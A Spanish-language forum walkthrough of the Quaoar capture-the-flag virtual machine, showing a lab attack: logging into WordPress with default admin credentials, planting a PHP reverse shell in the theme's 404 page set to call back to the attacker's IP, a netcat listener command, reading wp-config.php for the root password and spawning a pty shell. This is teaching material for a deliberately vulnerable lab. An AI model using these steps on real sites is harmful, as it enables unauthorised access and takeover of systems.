hackfest2016: Quaoar - [ Walkthrough ]

Iniciado por Stuxnet, Julio 19, 2017, 12:12:45 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.


En este tutorial vamos a resolver la maquina virtual hackfest2016: Quaoar la cual la pueden descargar desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Viendo la descripción de la maquina virtual pide que encontremos 3 flags.

Código: text
There are 3 flags on this machine 

1. Get a shell
2. Get root access
3. There is a post exploitation flag on the box


Código: text
Laboratorio:
Atacante Kali: 192.168.1.100
Victima Quaoar: 192.168.1.101


Escaneo:


Como vemos tenemos un apache corriendo en el 80.


Buscando directorios con nmap


Genial tenemos un wordpress. Ahora le pasare un scanner conocido como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Al poco tiempo del scaneo nos mostrará que el sitio esta utilizando contraseñas por defecto que serian admin:admin así que vamos a omitir cualquier explotación de vulnerabilidades web y obtendremos acceso al equipo mediante una reverse shell en php.

Ingresando al administrador del blog

Código: text
user: admin
password:admin


Una vez echo esto, nos vamos al appearance --> editor  --> 404.php, la página 404 es la que tendra la reverse shell que voy a utilizar que será una de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.


Procedemos a modificar la reverse shell.

Código: text
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS


IP Atacante: 192.168.1.100
Por: lo dejare por defecto.

Ahora pondremos a la escucha nuestro netcat

Código: text
nc -v -n -l -p 1234


Al ingresar a la dirección de la página 404 obtendremos acceso al sistema, la url seria No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. twentyfourteen es el theme que se esta utilizando en el sitio.


Flag: 1. Get a shell


Con el comando locate voy a buscar el archivo flag.txt, al hacer eso nos dice que se encuentra en la carpeta /home/wpadmin/, después solo vere su contenido con el comando cat.

Flag 2. Get root access

Como el sitio esta en wordpress se me ocurrio hacerle un cat al archivo wp-config.php muchas veces colocan por ahi la password root


Genial la contraseña es: rootpassword!

Ahora voy a obtener una bash con el siguiente comando.

Código: text
python -c 'import pty;pty.spawn("/bin/bash")'



Yeaaa! como podemos ver, en la carpeta root se encuentra la segunda flag.

Flag 3. There is a post exploitation flag on the box.

Sin duda esta fué la que me tomo más tiempo, para encontra esta flag utilice de recurso No tienes permitido ver los links. Registrarse o Entrar a mi cuenta después de un rato leyendo el repositorio hago un cat sobre  /etc/crontab

Código: text
Crontab es un simple archivo de texto que guarda una lista de comandos a ejecutar en un tiempo especificado por el usuario



Nada de flag ):, ahora me iré a ver la carperta cron.d en el directorio etc.


Fuck yea! Al hacerle un cat al archivo php5 que se encontraba en la carpeta nos arroja información y un texto md5 cual es la ultima flag.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta